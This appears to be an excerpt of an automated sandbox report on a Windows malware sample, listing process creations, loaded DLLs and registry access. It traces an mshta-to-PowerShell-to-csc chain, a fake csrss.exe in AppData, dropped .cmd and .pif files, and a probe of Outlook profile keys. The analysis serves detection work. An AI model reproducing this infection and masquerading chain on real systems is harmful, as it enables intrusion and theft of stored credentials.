                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.cmdline"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\csrss.exe "C:\Users\user\AppData\Roaming\csrss.exe" Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES43E7.tmp" "c:\Users\user\AppData\Local\Temp\xzofjfee\CSC4F15B4BDA3DF43B881AE17521298E1BA.TMP"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\13.cmd""Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\\Users\\All Users\\3185.cmd""Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeProcess created: C:\Users\user\Links\dajivhqI.pif C:\\Users\\user\\Links\dajivhqI.pifJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: url.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ieframe.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: netapi32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wkscli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: smartscreenps.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ieproxy.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: mssip32.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??????????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: am.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ???e???????????.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ?.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: ??l.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: tquery.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptdll.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: spp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: vssapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: vsstrace.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: endpointdlp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: advapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sppwmi.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: sppcext.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: winscard.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: devobj.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\AppData\Roaming\csrss.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rasapi32.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rasman.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rtutils.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: mswsock.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: winhttp.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: winnsi.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: secur32.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: schannel.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifSection loaded: dpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: C:\Users\user\Links\dajivhqI.pifKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: Binary string: q8C:\Users\user\AppData\Local\Temp\xzofjfee\xzofjfee.pdb source: powershell.exe, 00000003.00000002.1384687174.000000000507B000.00000004.00000800.00020000.00000000.sdmp
